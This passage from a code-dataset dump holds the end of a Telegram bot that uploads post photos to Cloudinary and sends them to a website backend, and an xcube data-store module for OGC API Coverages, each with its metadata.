информацию о фото\r\n photo = message.photo[-1] # Берем последнее (самое большое) фото из списка\r\n\r\n # Сохраняем информацию о фото в состоянии\r\n await state.update_data(photo=photo)\r\n\r\n # Все данные собраны, можно выполнять дальнейшие действия (например, сохранение поста в базу данных)\r\n data = await state.get_data()\r\n # Выводим данные для проверки\r\n \r\n file_id = photo.file_id\r\n file_info = await bot.get_file(file_id)\r\n photo_path = 'static/' + file_info.file_unique_id + '.png'\r\n await photo.download(photo_path)\r\n file =open(photo_path, 'rb')\r\n load = {'file': file}\r\n \r\n\r\n \r\n # Загружаем файл на Cloudinary\r\n result = cloudinary.uploader.upload(file)\r\n \r\n if result:\r\n # Обработка успешного ответа\r\n \r\n secure_url = result['secure_url']\r\n print('Фото успешно загружено:', secure_url)\r\n await message.answer(f\"Пост: {data['title']}\\nОписание: {data['description']}\\nКатегория: {data['category']}\")\r\n json = {'title': data['title'], 'description':data['description'], 'category':data['category'], 'photo_url':secure_url }\r\n url = 'http://balancer-visit-1434470264.eu-north-1.elb.amazonaws.com/newpost'\r\n headers = {'Token': token_access}\r\n requests.post(url=url, json=json, headers=headers)\r\n await message.answer(f'{secure_url}')\r\n else:\r\n # Обработка ошибки\r\n await message.answer('x')\r\n await state.finish()\r\n file.close()\r\n os.remove(photo_path)\r\n\r\nclass NewWorkStates(StatesGroup):\r\n waiting_for_title = State()\r\n waiting_for_content = State()\r\n waiting_for_category = State()\r\n waiting_for_photo = State()\r\n\r\n@dp.message_handler(Command('new_work'), IDFilter(user_id=[881704893]))\r\nasync def new_work(message: types.Message):\r\n await message.answer('Введите название работы:')\r\n await NewWorkStates.waiting_for_title.set()\r\n\r\n@dp.message_handler(state=NewWorkStates.waiting_for_title)\r\nasync def process_title_work(message: types.Message, state: FSMContext):\r\n title = message.text\r\n await state.update_data(title=title)\r\n\r\n # Втор��й запрос - контент работы\r\n await message.answer('Введите контент работы:')\r\n await NewWorkStates.waiting_for_content.set()\r\n\r\n # Обработчик ответа на контент работы\r\n@dp.message_handler(state=NewWorkStates.waiting_for_content)\r\nasync def process_content_work(message: types.Message, state: FSMContext):\r\n content = message.text\r\n await state.update_data(content=content)\r\n\r\n # Третий запрос - категория работы\r\n await message.answer('Введите категорию работы:')\r\n await NewWorkStates.waiting_for_category.set()\r\n\r\n # Обработчик ответа на категорию работы\r\n@dp.message_handler(state=NewWorkStates.waiting_for_category)\r\nasync def process_category_work(message: types.Message, state: FSMContext):\r\n category = message.text\r\n await state.update_data(category=category)\r\n\r\n # Четвертый запрос - фото работы\r\n await message.answer('Прикрепите фото работы:')\r\n await NewWorkStates.waiting_for_photo.set()\r\n\r\n # Обработчик фото работы\r\n@dp.message_handler(content_types=['photo'], state=NewWorkStates.waiting_for_photo)\r\nasync def process_photo_work(message: types.Message, state: FSMContext):\r\n # Получаем информацию о фото работы\r\n photo = message.photo[-1]\r\n\r\n # Сохраняем информацию о фото работы в состоянии\r\n await state.update_data(photo=photo)\r\n\r\n # Все данные собраны, можно выполнять дальнейшие действия (например, сохранение работы в базу данных)\r\n data = await state.get_data()\r\n\r\n # Здесь выполните необходимые действия для обработки данных о работе и ее фото\r\n\r\n # Сбрасываем состояние\r\n await state.finish()\r\n\r\n file_id = photo.file_id\r\n file_info = await bot.get_file(file_id)\r\n photo_path = 'static/' + file_info.file_unique_id + '.png'\r\n await photo.download(photo_path)\r\n file = open(photo_path, 'rb')\r\n load = {'file': file}\r\n\r\n # Загружаем файл на Cloudinary\r\n result = cloudinary.uploader.upload(file)\r\n\r\n if result:\r\n # Обработка успешного ответа\r\n\r\n secure_url = result['secure_url']\r\n print('Фото успешно загружено:', secure_url)\r\n await message.answer(f\"Пост: {data['title']}\\nОписание: {data['content']}\\nКатегория: {data['category']}\")\r\n json = {'title': data['title'], 'description': data['content'], 'category': data['category'], 'photo_url': secure_url}\r\n url = 'http://balancer-visit-1434470264.eu-north-1.elb.amazonaws.com/newwork'\r\n headers = {'Token': token_access}\r\n requests.post(url=url, json=json, headers=headers)\r\n await message.answer(f'{secure_url}')\r\n\r\n\r\n\r\n# Запуск бота\r\nif __name__ == '__main__':\r\n from aiogram import executor\r\n executor.start_polling(dp, skip_updates=True)\r\n", "repo_name": "counterat/TelegramBotForBusinesCardWebsite", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8569, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cloudinary.config", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.Bot", "line_number": 20, "usage_type": "call"}, {"api_name": "aiogram.contrib.fsm_storage.memory.MemoryStorage", "line_number": 21, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "aiogram.dispatcher.filters.state.StatesGroup", "line_number": 27, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 28, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 29, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 30, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 31, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 35, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 35, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Command", "line_number": 34, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.IDFilter", "line_number": 34, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 41, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 41, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 41, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 51, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 61, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 61, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 61, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 71, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 71, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 71, "usage_type": "name"}, {"api_name": "cloudinary.uploader.upload", "line_number": 92, "usage_type": "call"}, {"api_name": "cloudinary.uploader", "line_number": 92, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 103, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 110, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.StatesGroup", "line_number": 112, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 113, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 114, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 115, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 116, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 119, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 119, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Command", "line_number": 118, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.IDFilter", "line_number": 118, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 124, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 124, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 124, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 134, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 134, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 134, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 144, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 144, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 144, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 154, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 154, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 154, "usage_type": "name"}, {"api_name": "cloudinary.uploader.upload", "line_number": 177, "usage_type": "call"}, {"api_name": "cloudinary.uploader", "line_number": 177, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 188, "usage_type": "call"}, {"api_name": "aiogram.executor.start_polling", "line_number": 196, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 196, "usage_type": "name"}]} +{"seq_id": "20424305478", "text": "import atexit\nimport os\nimport re\nimport shutil\nimport tempfile\nimport datetime\nfrom typing import Any, Container, Collection, Mapping\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\nimport collections.abc\n\nimport dateutil.parser\nimport dateutil.relativedelta\nimport dateutil.rrule\nimport numpy as np\nimport requests\nimport xarray as xr\nimport xcube.core.normalize\nfrom xcube.core.store import DATASET_TYPE\nfrom xcube.core.store import DataDescriptor\nfrom xcube.core.store import DataOpener\nfrom xcube.core.store import DataStore\nfrom xcube.core.store import DataStoreError\nfrom xcube.core.store import DataTypeLike\nfrom xcube.core.store import DatasetDescriptor\nfrom xcube.core.store import DefaultSearchMixin\nfrom xcube.util.jsonschema import JsonBooleanSchema, JsonArraySchema, \\\n JsonNumberSchema, JsonDatetimeSchema\nfrom xcube.util.jsonschema import JsonObjectSchema\nfrom xcube.util.jsonschema import JsonStringSchema\nfrom xcube.util.undefined import UNDEFINED\nfrom xcube_ogccov.constants import OGCCOV_DATA_OPENER_ID\n\n\nclass OGCCovDataOpener(DataOpener):\n \"\"\"A data opener for OGC API - Coverages\"\"\"\n\n def __init__(self, server_url=None):\n \"\"\"Instantiate an OGC API - Coverages data opener.\n\n :param server_url: URL of the API server\n \"\"\"\n\n self._server_url = server_url\n self._normalize_names = True\n self._create_temporary_directory()\n\n def get_open_data_params_schema(self, data_id: Optional[str] = None) -> \\\n JsonObjectSchema:\n self._assert_valid_data_id(data_id, allow_none=True)\n params = dict(\n subset=JsonObjectSchema(), # TODO make the subset schema stricter\n bbox=JsonArraySchema(items=(\n JsonNumberSchema(),\n JsonNumberSchema(),\n JsonNumberSchema(),\n JsonNumberSchema()),\n description='bounding box (min_x, min_y, max_x, max_y)'),\n datetime=JsonArraySchema(),\n properties=JsonArraySchema(\n items=(JsonStringSchema()),\n ),\n scale_factor=JsonNumberSchema(\n description='downscaling factor, applied on each axis'\n ),\n scale_axes=JsonObjectSchema(\n description='mapping from axis name to downscaling factor'\n ),\n scale_size=JsonObjectSchema(\n description='mapping from axis name to desired size'\n ),\n subset_crs=JsonStringSchema(\n description='CRS for the specified subset'\n ),\n bbox_crs=JsonStringSchema(\n description='CRS for the specified bbox'\n ),\n crs=JsonStringSchema(\n description='reproject the output to this CRS'\n )\n )\n return JsonObjectSchema(\n properties=params,\n required=[],\n additional_properties=False\n )\n\n def open_data(self, data_id: str, **open_params) -> xr.Dataset:\n # Unofficial parameters for testing, debugging, etc.\n # They're not in the schema so we remove them before validating.\n read_file_from = open_params.pop('_read_file_from', None)\n save_file_to = open_params.pop('_save_file_to', None)\n save_zarr_to = open_params.pop('_save_zarr_to', None)\n save_request_to = open_params.pop('_save_request_to', None)\n\n schema = self.get_open_data_params_schema(data_id)\n schema.validate_instance(open_params)\n\n # Fill in defaults from the schema\n props = schema.properties\n all_open_params = {k: props[k].default for k in props\n if props[k].default != UNDEFINED}\n all_open_params.update(open_params)\n\n # dataset = self._create_empty_dataset(data_id, all_open_params)\n\n ogc_params = [\n self._convert_store_param(p) for p in all_open_params.items()\n ] + [('f', 'netcdf')]\n\n response = requests.get(\n self._get_coverage_link(data_id),\n params=dict(ogc_params)\n )\n\n if response.status_code == 200:\n temp_subdir = tempfile.mkdtemp(dir=self._tempdir)\n filepath = os.path.join(temp_subdir, 'dataset.nc')\n with open(filepath, 'bw') as fh:\n fh.write(response.content)\n dataset = xr.open_dataset(filepath, engine='netcdf4')\n\n if save_zarr_to:\n dataset.to_zarr(save_zarr_to)\n return dataset\n else:\n r = response.json()\n if 'error' in r:\n e = r['error']\n message = e['message']\n else:\n message = response.content\n raise DataStoreError(\n f'Error opening data: {response.status_code}: {message}'\n )\n\n def get_data_ids(self,\n data_type: DataTypeLike = None,\n include_attrs: Container[str] = None) -> \\\n Union[Iterator[str], Iterator[Tuple[str, Dict[str, Any]]]]:\n response = requests.get(f'{self._server_url}/collections')\n collections = response.json()['collections']\n return (collection['id'] for collection in collections)\n\n def has_data(self, data_id: str, data_type: Optional[str] = None) \\\n -> bool:\n return data_id in self.get_data_ids(data_type)\n\n @staticmethod\n def _convert_store_param(kvp: Tuple[str, Any]) -> Tuple[str, str]:\n key, value = kvp\n if key in {'scale_factor', 'subset_crs', 'bbox_crs', 'crs'}:\n # Pass through, converting underscores to hyphens if present\n return key.replace('_', '-'), value\n elif key == 'datetime':\n if len(value) == 1:\n return 'datetime', value\n elif len(value) == 2:\n return 'datetime', '/'.join(value)\n else:\n raise ValueError(f'Invalid datetime: \"{value}\"')\n elif key == 'subset':\n return 'subset', OGCCovDataOpener._subset_dict_to_string(value)\n elif key == 'bbox':\n x0, y0, x1, y1 = value\n return 'bbox', f'{x0},{y0},{x1},{y1}'\n elif key == 'properties':\n return 'properties', ','.join(value)\n elif key in {'scale-axes', 'scale-size'}:\n return (\n key.replace('_', '-'),\n ','.join([f'{ax}({v})' for ax, v in value.items()])\n )\n else:\n raise ValueError(f'Unknown parameter \"{key}\"')\n\n @staticmethod\n def _subset_dict_to_string(subset_dict: dict[str, Any]) -> str:\n parts = []\n for axis, range_ in subset_dict.items():\n if (isinstance(range_, collections.abc.Sequence)\n and not isinstance(range_, str)):\n if len(range_) == 1:\n parts.append(f'{axis}({range_[0]})')\n elif len(range_) == 2:\n range_string = ':'.join(\n ['*' if x is None else f'{x}' for x in range_]\n )\n parts.append(f'{axis}({range_string})')\n else:\n raise ValueError(\n f'Invalid subset range {range_} for axis {axis}'\n )\n else:\n parts.append(f'{axis}({str(range_)})')\n return ','.join(parts)\n\n def _create_empty_dataset(self, data_id, open_params: dict) -> xr.Dataset:\n \"\"\"Make a dataset with space and time dimensions but no data variables\n\n :param open_params: opener parameters\n :return: a dataset with the spatial and temporal dimensions given in\n the supplied parameters and no data variables\n \"\"\"\n\n store = OGCCovDataStore()\n data_descriptor = store.describe_data(data_id)\n bbox = open_params.get('bbox', data_descriptor.bbox)\n spatial_res = open_params.get('spatial_res',\n data_descriptor.spatial_res)\n # arange returns a half-open range, so we add *almost* a whole\n # spatial_res to the upper limit to make sure that it's included.\n lons = np.arange(bbox[0], bbox[2] + (spatial_res * 0.99), spatial_res)\n lats = np.arange(bbox[1], bbox[3] + (spatial_res * 0.99), spatial_res)\n\n time_range = open_params['time_range']\n times = self._create_time_range(time_range[0], time_range[1],\n data_descriptor.time_period)\n return xr.Dataset({}, coords={'time': times, 'lat': lats, 'lon': lons})\n\n @staticmethod\n def _create_time_range(t_start: str, t_end: str, t_interval: str):\n \"\"\"Turn a start, end, and time interval into an array of datetime64s\n\n The array will contain times spaced at t_interval.\n If the time from start to end is not an exact multiple of the\n specified interval, the range will extend beyond t_end by a fraction\n of an interval.\n\n :param t_start: start of time range (inclusive) (ISO 8601)\n :param t_end: end of time range (inclusive) (ISO 8601)\n :param t_interval: time interval (format e.g. \"2W\", \"3M\" \"1Y\")\n :return: a NumPy array of datetime64 data from t_start to t_end with\n an interval of t_period. If t_period is in months or years,\n t_start and t_end will be rounded (down and up respectively)\n to the nearest whole month.\n \"\"\"\n dt_start = dateutil.parser.isoparse(t_start)\n dt_end = datetime.datetime.now() if t_end is None \\\n else dateutil.parser.isoparse(t_end)\n period_number, period_unit = \\\n OGCCovDataOpener._parse_time_period(t_interval)\n timedelta = np.timedelta64(period_number, period_unit)\n relativedelta = OGCCovDataOpener._period_to_relativedelta(\n period_number, period_unit\n )\n one_microsecond = dateutil.relativedelta.relativedelta(microseconds=1)\n # Months and years can be of variable length, so we need to reduce the\n # resolution of the start and end appropriately if the aggregation\n # period is in one of these units.\n if period_unit in 'MY':\n range_start = dt_start.strftime('%Y-%m')\n range_end = (dt_end + relativedelta - one_microsecond). \\\n strftime('%Y-%m')\n else:\n range_start = dt_start.isoformat()\n range_end = (dt_end + relativedelta - one_microsecond).isoformat()\n\n return np.arange(range_start, range_end, timedelta,\n dtype=f'datetime64')\n\n @staticmethod\n def _parse_time_period(specifier: str) -> Tuple[int, str]:\n \"\"\"Convert a time period (e.g. '10D', 'Y') to a NumPy timedelta\"\"\"\n time_match = re.match(r'^(\\d+)([hmsDWMY])$',\n specifier)\n time_number_str = time_match.group(1)\n time_number = 1 if time_number_str == '' else int(time_number_str)\n time_unit = time_match.group(2)\n return time_number, time_unit\n\n @staticmethod\n def _period_to_relativedelta(number: int, unit: str) \\\n -> dateutil.relativedelta:\n conversion = dict(Y='years', M='months', D='days', W='weeks',\n h='hours', m='minutes', s='seconds')\n return dateutil.relativedelta. \\\n relativedelta(**{conversion[unit]: number})\n\n def _normalize_dataset(self, dataset):\n dataset = xcube.core.normalize.normalize_dataset(dataset)\n\n # These steps should be taken care of by the core normalizer now.\n # TODO: check that they are.\n # dataset = dataset.rename_dims({\n # 'longitude': 'lon',\n # 'latitude': 'lat'\n # })\n # dataset = dataset.rename_vars({'longitude': 'lon', 'latitude': 'lat'})\n # dataset.transpose('time', ..., 'lat', 'lon')\n\n dataset.coords['time'].attrs['standard_name'] = 'time'\n # Correct units not entirely clear: cubespec document says\n # degrees_north / degrees_east for WGS84 Schema, but SH Plugin\n # had decimal_degrees.\n if 'lat' in dataset.coords:\n dataset.coords['lat'].attrs['standard_name'] = 'latitude'\n dataset.coords['lat'].attrs['units'] = 'degrees_north'\n if 'lon' in dataset.coords:\n dataset.coords['lon'].attrs['standard_name'] = 'longitude'\n dataset.coords['lon'].attrs['units'] = 'degrees_east'\n\n # TODO: Temporal coordinate variables MUST have units, standard_name,\n # and any others. standard_name MUST be \"time\", units MUST have\n # format \" since \", where datetime must have\n # ISO-format.\n\n if self._normalize_names:\n rename_dict = {}\n for name in dataset.data_vars.keys():\n normalized_name = re.sub(r'\\W|^(?=\\d)', '_', str(name))\n if name != normalized_name:\n rename_dict[name] = normalized_name\n dataset_renamed = dataset.rename_vars(rename_dict)\n return dataset_renamed\n else:\n return dataset\n\n def _assert_valid_data_id(self, data_id: str,\n allow_none: bool = False) -> None:\n if (data_id is None and not allow_none) or not self.has_data(data_id):\n raise ValueError(f'Unknown data id \"{data_id}\"')\n\n def _create_temporary_directory(self):\n # Create a temporary directory to hold downloaded files and a hook to\n # delete it when the interpreter exits. xarray.open reads data lazily\n # so we can't just delete the file after returning the Dataset. We\n # could also use weakref hooks to delete individual files when the\n # corresponding object is garbage collected, but even then the\n # directory is useful to group the files and offer an extra assurance\n # that they will be deleted.\n tempdir = tempfile.mkdtemp()\n\n def delete_tempdir():\n # This method is hard to unit test, so we exclude it from test\n # coverage reports.\n shutil.rmtree(tempdir, ignore_errors=True) # pragma: no cover\n\n atexit.register(delete_tempdir)\n self._tempdir = tempdir\n\n def _get_coverage_link(self, collection_id):\n links = self._get_collection_links(\n collection_id,\n {\n 'rel': {'coverage',\n 'http://www.opengis.net/def/rel/ogc/1.0/coverage'},\n 'type': {'netcdf', 'application/netcdf',\n 'application/x-netcdf'}\n }\n )\n if len(links) > 0:\n # If multiple coverage links available, use the first.\n return links[0]\n else:\n # Fall back to standard endpoint if none specified explicitly.\n return self._server_url + f'/{collection_id}/coverage'\n\n def _get_collection_links(self, collection_id: str,\n selectors: dict[str, Collection[str]]) -> \\\n list[str]:\n response = requests.get(\n f'{self._server_url}/collections/{collection_id}')\n collection = response.json()\n result = []\n for link in collection.get('links', []):\n if (all([link.get(prop) in selectors[prop] for prop in selectors])\n and 'href' in link):\n result.append(link['href'])\n print(result)\n return result\n\n\nclass OGCCovDataStore(DefaultSearchMixin, OGCCovDataOpener, DataStore):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n @classmethod\n def get_data_store_params_schema(cls) -> JsonObjectSchema:\n params = dict(\n normalize_names=JsonBooleanSchema(default=False)\n )\n\n store_params = dict(\n server_url=JsonStringSchema(),\n )\n\n params.update(store_params)\n return JsonObjectSchema(\n properties=params,\n required=None,\n additional_properties=False\n )\n\n @classmethod\n def get_data_types(cls) -> Tuple[str, ...]:\n return DATASET_TYPE.alias,\n\n def get_data_types_for_data(self, data_id: str) -> Tuple[str, ...]:\n self._assert_valid_data_id(data_id)\n return DATASET_TYPE.alias,\n\n def describe_data(self, data_id: str,\n data_type: Optional[str] = None) \\\n -> DatasetDescriptor:\n self._assert_valid_data_id(data_id)\n self._validate_data_type(data_type)\n\n return DatasetDescriptor(\n data_id=data_id,\n data_type=DATASET_TYPE,\n time_period=None, # str\n spatial_res=None, # float\n coords=None, # Mapping[str, 'VariableDescriptor'],\n data_vars=None, # Mapping[str, 'VariableDescriptor'],\n attrs=None, # Mapping[Hashable, any],\n open_params_schema=None, # JsonObjectSchema,\n **(self._domainset_params(data_id))\n )\n\n def _domainset_params(self, data_id: str) -> dict[str, Any]:\n params = {}\n domainset = requests.get(\n f'{self._server_url}/collections/{data_id}/coverage/domainset',\n params=dict(f='json')\n ).json()\n grid = domainset.get('generalGrid', {})\n params['dims'] = {}\n bbox = [None, None, None, None]\n for index, axis in enumerate(grid.get('axis', [])):\n label = axis.get('axisLabel', '?')\n params['dims'][label] = index\n if label in {'lon', 'longitude', 'x'}:\n bbox[0] = float(axis.get('lowerBound', '0'))\n bbox[2] = float(axis.get('upperBound', '0'))\n elif label in {'lat', 'latitude', 'y'}:\n bbox[1] = float(axis.get('lowerBound', '0'))\n bbox[3] = float(axis.get('upperBound', '0'))\n elif label in {'time', 't'}:\n try:\n params['time_range'] = tuple(\n datetime.datetime.fromisoformat(\n axis.get(bound)).strftime('%Y-%m-%d')\n for bound in ['lowerBound', 'upperBound'])\n except ValueError:\n # Ignore malformed timestamps\n pass\n params['bbox'] = None if None in bbox else tuple(bbox)\n params['crs'] = grid.get('srsName')\n return params\n\n # noinspection PyTypeChecker\n def search_data(self, data_type: Optional[DataTypeLike] = None,\n **search_params) \\\n -> Iterator[DataDescriptor]:\n self._validate_data_type(data_type)\n return super().search_data(data_type=data_type,\n **search_params)\n\n def get_data_opener_ids(self, data_id: Optional[str] = None,\n data_type: Optional[str] = None) \\\n -> Tuple[str, ...]:\n self._validate_data_type(data_type)\n self._assert_valid_data_id(data_id, allow_none=True)\n return OGCCOV_DATA_OPENER_ID,\n\n def get_open_data_params_schema(self, data_id: Optional[str] = None,\n opener_id: Optional[str] = None) \\\n -> JsonObjectSchema:\n # At present, there's only one opener ID available, so we do nothing\n # with it except to check that it was correct (or None).\n self._assert_valid_opener_id(opener_id)\n self._assert_valid_data_id(data_id, allow_none=True)\n return super().get_open_data_params_schema(data_id)\n\n def open_data(self, data_id: str, opener_id: Optional[str] = None,\n **open_params) -> xr.Dataset:\n self._assert_valid_opener_id(opener_id)\n self._assert_valid_data_id(data_id)\n return super().open_data(data_id, **open_params)\n\n ###########################################################################\n # Implementation helpers\n\n @staticmethod\n def _validate_data_type(data_type: DataTypeLike):\n if not OGCCovDataStore._is_data_type_satisfied(data_type):\n raise DataStoreError(\n f'Supplied data type {data_type!r} is not compatible'\n f' with \"{DATASET_TYPE!r}.\"'\n )\n\n @staticmethod\n def _is_data_type_satisfied(\n data_type: DataTypeLike) -> bool:\n # We expect all datasets to be available as cubes, so we simply check\n # against TYPE_SPECIFIER_CUBE.\n if data_type is None:\n return True\n return DATASET_TYPE.is_super_type_of(data_type)\n\n @staticmethod\n def _assert_valid_opener_id(opener_id):\n if opener_id is not None and opener_id != OGCCOV_DATA_OPENER_ID:\n raise DataStoreError(\n f'Data opener identifier must be \"{OGCCOV_DATA_OPENER_ID}\"'\n f'but got \"{opener_id}\"')\n", "repo_name": "dcs4cop/xcube-ogccov", "sub_path": "xcube_ogccov/store.py", "file_name": "store.py", "file_ext": "py", "file_size_in_byte": 20915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "xcube.core.store.DataOpener", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 51, "usage_type": "name"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 55, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonArraySchema", "line_number": 56, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 57, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 58, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 59, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 60, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonArraySchema", "line_number": 62, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonArraySchema", "line_number": 63, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 64, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 66, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 69, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 72, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 75, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 78, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 81, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 85, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 52, "usage_type": "name"}, {"api_name": "xcube.util.undefined.UNDEFINED", "line_number": 105, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 114, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "xarray.open_dataset", "line_number": 124, "usage_type": "call"}, {"api_name": "xcube.core.store.DataStoreError", "line_number": 136, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 91, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Container", "line_number": 142, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 144, "usage_type": "call"}, {"api_name": "collections.abc", "line_number": 145, "usage_type": "name"}, {"api_name": "collections.abc", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 181, "usage_type": "name"}, {"api_name": "collections.abc.abc", "line_number": 184, "usage_type": "attribute"}, {"api_name": "collections.abc", "line_number": 184, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 217, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 222, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 201, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parser.isoparse", "line_number": 241, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 241, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 241, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 242, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parser.isoparse", "line_number": 243, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 243, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 243, "usage_type": "name"}, {"api_name": "numpy.timedelta64", "line_number": 246, "usage_type": "call"}, {"api_name": "dateutil.parser.relativedelta.relativedelta", "line_number": 250, "usage_type": "call"}, {"api_name": "dateutil.parser.relativedelta", "line_number": 250, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 250, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 262, "usage_type": "call"}, {"api_name": "re.match", "line_number": 268, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 266, "usage_type": "name"}, {"api_name": "dateutil.parser.relativedelta.relativedelta", "line_number": 280, "usage_type": "call"}, {"api_name": "dateutil.parser.relativedelta", "line_number": 280, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 280, "usage_type": "name"}, {"api_name": "dateutil.parser.relativedelta", "line_number": 277, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 277, "usage_type": "name"}, {"api_name": 